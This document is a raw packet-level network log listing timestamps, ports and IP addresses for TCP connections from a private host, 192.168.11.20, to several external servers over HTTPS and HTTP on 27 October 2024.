Oct 27, 2024 17:03:30.910286903 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.910322905 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:30.910336018 CET	49744	443	192.168.11.20	52.113.194.132
Oct 27, 2024 17:03:30.910351992 CET	443	49744	52.113.194.132	192.168.11.20
Oct 27, 2024 17:03:53.483589888 CET	49741	80	192.168.11.20	199.232.210.172
Oct 27, 2024 17:03:53.483589888 CET	49743	80	192.168.11.20	142.250.80.99
Oct 27, 2024 17:03:53.547687054 CET	49742	443	192.168.11.20	23.44.201.5
Oct 27, 2024 17:03:53.577833891 CET	80	49741	199.232.210.172	192.168.11.20
Oct 27, 2024 17:03:53.577930927 CET	80	49743	142.250.80.99	192.168.11.20
Oct 27, 2024 17:03:53.578197956 CET	49743	80	192.168.11.20	142.250.80.99
Oct 27, 2024 17:03:53.579021931 CET	80	49741	199.232.210.172	192.168.11.20
Oct 27, 2024 17:03:53.579186916 CET	49741	80	192.168.11.20	199.232.210.172
Oct 27, 2024 17:04:31.818439007 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:31.818456888 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:31.818813086 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:31.821247101 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:31.821254969 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.019185066 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.019356966 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.021178007 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.021183968 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.021373987 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.054733992 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.054831028 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.054879904 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.509450912 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.509546995 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.509742975 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.511790037 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.511790037 CET	49745	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.511811972 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.511818886 CET	443	49745	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.584177017 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.584266901 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:32.584455013 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.584647894 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:32.584701061 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.121786118 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.122128010 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.123007059 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.123053074 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.123859882 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.124990940 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.124990940 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.125233889 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.627931118 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628072023 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628154039 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628226995 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628298998 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628371000 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628381968 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.628428936 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628444910 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.628501892 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628580093 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628618956 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.628642082 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.628705025 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.628894091 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.629147053 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.629302979 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.629381895 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.629403114 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.629448891 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.629573107 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.629640102 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.629858971 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.630026102 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.630026102 CET	49746	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:33.630078077 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:33.630095005 CET	443	49746	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:36.928333044 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:36.928371906 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:36.928512096 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:36.928867102 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:36.928877115 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.340464115 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.340970993 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.340993881 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.342756033 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.343605995 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369196892 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369365931 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.369400978 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369430065 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.369540930 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369551897 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369575977 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.369602919 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369623899 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.369699001 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369719028 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.369792938 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369834900 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369864941 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.369880915 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.370100975 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.370124102 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.370264053 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.370274067 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.412046909 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.554949045 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.557543039 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.558406115 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.558855057 CET	49750	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.558875084 CET	443	49750	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.767523050 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.768841982 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.768945932 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.768969059 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.769910097 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.769932985 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.770561934 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.770840883 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.770982027 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.771003962 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.771064043 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.771143913 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.771783113 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.771783113 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.771951914 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.772242069 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.772650957 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.772672892 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.773304939 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.773968935 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.774138927 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.819489002 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.819499969 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.819521904 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:37.819551945 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:37.865982056 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.230801105 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.230962992 CET	443	49753	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.232006073 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.232006073 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.232047081 CET	49753	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.232588053 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.275964975 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.326973915 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.327085018 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.327814102 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.327860117 CET	49751	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.327877045 CET	443	49751	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.328795910 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.328825951 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.329298973 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.329965115 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.329981089 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.338258028 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.338334084 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.338409901 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.338486910 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.339013100 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.339013100 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.641367912 CET	49752	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.641382933 CET	443	49752	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.727602959 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.728121996 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.728130102 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.728509903 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.729074001 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.729074001 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.729156017 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.782429934 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.929009914 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.929044962 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.929079056 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.929156065 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:38.929203033 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.929539919 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.930165052 CET	49754	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:38.930174112 CET	443	49754	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:40.685271025 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:40.685301065 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:40.685653925 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:40.686024904 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:40.686038971 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:41.082926989 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:41.083308935 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:41.083317041 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:41.083600044 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:41.084629059 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:41.084676981 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:41.128115892 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:42.367521048 CET	49740	443	192.168.11.20	40.126.24.81
Oct 27, 2024 17:04:42.471719980 CET	443	49740	40.126.24.81	192.168.11.20
Oct 27, 2024 17:04:42.472013950 CET	49740	443	192.168.11.20	40.126.24.81
Oct 27, 2024 17:04:51.119460106 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:51.119596958 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:51.119785070 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:51.393553019 CET	49755	443	192.168.11.20	142.251.40.100
Oct 27, 2024 17:04:51.393593073 CET	443	49755	142.251.40.100	192.168.11.20
Oct 27, 2024 17:04:52.867633104 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:52.867652893 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:52.868030071 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:52.868789911 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:52.868798971 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.084327936 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.084588051 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.085784912 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.085808039 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.086369991 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.087461948 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.087596893 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.087615967 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.582820892 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.582873106 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.583103895 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.583123922 CET	49766	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.583133936 CET	443	49766	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.629060984 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.629079103 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.629240036 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.629494905 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.629506111 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.826044083 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.826283932 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.827167034 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.827171087 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.827362061 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.828407049 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.828536034 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.828538895 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.828586102 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.828602076 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.828634977 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.828687906 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:53.828830004 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:53.828872919 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.317451000 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.317519903 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.317707062 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.317873955 CET	49767	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.317884922 CET	443	49767	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.330916882 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.330939054 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.331121922 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.331335068 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.331347942 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.526485920 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.526686907 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.527767897 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.527777910 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.527995110 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.529082060 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.529189110 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.529206038 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.529218912 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:54.529283047 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.529488087 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:54.529498100 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.012568951 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.012656927 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.012839079 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.012932062 CET	49768	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.012948036 CET	443	49768	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.059345961 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.059374094 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.059561968 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.059823990 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.059834957 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.259032965 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.259299040 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.260243893 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.260258913 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.260581017 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.261749029 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.261866093 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.261893034 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.261915922 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.261969090 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.261985064 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.262351990 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.262398005 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.770651102 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.770912886 CET	443	49769	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.771028996 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.771120071 CET	49769	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.834014893 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.834069014 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:55.834247112 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.834434032 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:55.834460020 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.032176018 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.032546997 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.033263922 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.033274889 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.033586979 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.034748077 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.034940004 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.034948111 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.478245020 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.478329897 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.478584051 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.478777885 CET	49770	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.478790045 CET	443	49770	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.893460989 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.893482924 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:56.893846035 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.894030094 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:56.894037962 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.094089985 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.094367981 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.095151901 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.095168114 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.095653057 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.096733093 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.097836018 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.097851038 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.097887039 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.097927094 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.097934961 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.097944021 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.098128080 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.098320007 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.098326921 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.098515987 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.098557949 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.098704100 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.098768950 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.098898888 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.098933935 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.099095106 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.099109888 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.099476099 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.099495888 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.099670887 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.099693060 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.099710941 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.099720955 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.099911928 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.099927902 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.100105047 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.100120068 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.100292921 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.100301981 CET	443	49771	104.21.64.165	192.168.11.20
Oct 27, 2024 17:04:57.100486994 CET	49771	443	192.168.11.20	104.21.64.165
Oct 27, 2024 17:04:57.100502014 CET	443	49771	104.21.64.165	192.168.11.20
